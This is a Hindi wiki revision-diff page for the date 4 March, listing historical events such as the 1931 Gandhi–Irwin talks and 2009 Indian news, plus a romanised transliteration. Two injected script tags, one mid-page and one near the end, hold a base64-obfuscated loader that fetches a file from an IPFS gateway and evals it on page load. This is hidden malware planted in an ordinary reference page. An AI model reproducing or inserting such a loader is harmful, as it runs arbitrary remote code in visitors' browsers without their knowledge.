Difference between revisions of "4 मार्च"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "राजनैतिक" to "राजनीतिक")
m (Text replace - "नाराज" to "नाराज़")
Line 5: Line 5:
 
==4 मार्च की महत्त्वपूर्ण घटनाएँ==
 
==4 मार्च की महत्त्वपूर्ण घटनाएँ==
 
* [[1931]] - ब्रिटिश वायसराय, गवरनोर-जनरल एडवर्ड फ्रेदेरिक्क लिन्द्ले वुड और मोहनदास करमचंद [[गाँधी जी]] (महात्मा गाँधी) में भेंट | राजनीतिक कैदियों की रिहाई और नमक के सर्वजन उपयोग की छूट को लेकर मंत्रणा और इकरारनामे की घोषणा।
 
* [[1931]] - ब्रिटिश वायसराय, गवरनोर-जनरल एडवर्ड फ्रेदेरिक्क लिन्द्ले वुड और मोहनदास करमचंद [[गाँधी जी]] (महात्मा गाँधी) में भेंट | राजनीतिक कैदियों की रिहाई और नमक के सर्वजन उपयोग की छूट को लेकर मंत्रणा और इकरारनामे की घोषणा।
* [[2008]]-  तेलंगाना राज्य के गठन में हो रही देरी से नाराज तेलंगाना राष्ट्र समिति (टी.आर.एस) के विधायकों ने [[आन्ध्र प्रदेश]] विधानमण्डल की सदस्यता से इस्तीफा दिया। हिन्दी के प्रसिद्ध विद्वान [[डॉ. मदन लाल मधु]] को प्रतिष्ठित सम्मान मीडिया यूनियन ने स्वर्णाक्षर पुरस्कार से सम्मानित किया।
+
* [[2008]]-  तेलंगाना राज्य के गठन में हो रही देरी से नाराज़ तेलंगाना राष्ट्र समिति (टी.आर.एस) के विधायकों ने [[आन्ध्र प्रदेश]] विधानमण्डल की सदस्यता से इस्तीफा दिया। हिन्दी के प्रसिद्ध विद्वान [[डॉ. मदन लाल मधु]] को प्रतिष्ठित सम्मान मीडिया यूनियन ने स्वर्णाक्षर पुरस्कार से सम्मानित किया।
 
* [2009]] - [[रिजर्ब बैंक ऑफ़ इंडिया]] ने प्रमुख ब्याज दरों में आधा प्रतिशत की कटौती की घोषणा की। पटना उच्च न्यायालय के चन्दमौली कुमार प्रसाद को इलाहाबाद उच्च न्यायालय व कर्नाटक उच्च न्यायालय को न्यायधीश दीपक वर्मा को राजस्थान उच्च न्यायालय का मुख्य न्यायधीश बनाया गया है। राष्ट्रपति [[प्रतिभा पाटिल]] ने नवीन चावला के मुख्यचुनाव आयुक्त पद पर नियुक्ति को मंज़ूरी दी। [[राजस्थान]] के पोखरन से ब्रह्मोस मिसाइल के नये संस्करण का परीक्षण किया गया।
 
* [2009]] - [[रिजर्ब बैंक ऑफ़ इंडिया]] ने प्रमुख ब्याज दरों में आधा प्रतिशत की कटौती की घोषणा की। पटना उच्च न्यायालय के चन्दमौली कुमार प्रसाद को इलाहाबाद उच्च न्यायालय व कर्नाटक उच्च न्यायालय को न्यायधीश दीपक वर्मा को राजस्थान उच्च न्यायालय का मुख्य न्यायधीश बनाया गया है। राष्ट्रपति [[प्रतिभा पाटिल]] ने नवीन चावला के मुख्यचुनाव आयुक्त पद पर नियुक्ति को मंज़ूरी दी। [[राजस्थान]] के पोखरन से ब्रह्मोस मिसाइल के नये संस्करण का परीक्षण किया गया।
 
==4 मार्च को जन्मे व्यक्ति==
 
==4 मार्च को जन्मे व्यक्ति==

Revision as of 11:16, 30 November 2010

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 4 march varsh ka 63 vaan (lip varsh mean yah 64 vaan) din hai. sal me abhi aur 302 din shesh haian.

4 march ki mahattvapoorn ghatanaean

  • 1931 - british vayasaray, gavaranor-janaral edavard phrederikk lindle vud aur mohanadas karamachand gaandhi ji (mahatma gaandhi) mean bheant | rajanitik kaidiyoan ki rihaee aur namak ke sarvajan upayog ki chhoot ko lekar mantrana aur ikararaname ki ghoshana.
  • 2008- telangana rajy ke gathan mean ho rahi deri se naraz telangana rashtr samiti (ti.ar.es) ke vidhayakoan ne andhr pradesh vidhanamandal ki sadasyata se istipha diya. hindi ke prasiddh vidvan d aau. madan lal madhu ko pratishthit samman midiya yooniyan ne svarnakshar puraskar se sammanit kiya.
  • [2009]] - rijarb baiank aauf iandiya ne pramukh byaj daroan mean adha pratishat ki katauti ki ghoshana ki. patana uchch nyayalay ke chandamauli kumar prasad ko ilahabad uchch nyayalay v karnatak uchch nyayalay ko nyayadhish dipak varma ko rajasthan uchch nyayalay ka mukhy nyayadhish banaya gaya hai. rashtrapati pratibha patil ne navin chavala ke mukhyachunav ayukt pad par niyukti ko manzoori di. rajasthan ke pokharan se brahmos misail ke naye sanskaran ka parikshan kiya gaya.

4 march ko janme vyakti

4 march ko hue nidhan

4 march ke mahattvapoorn avasar evan utsav

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh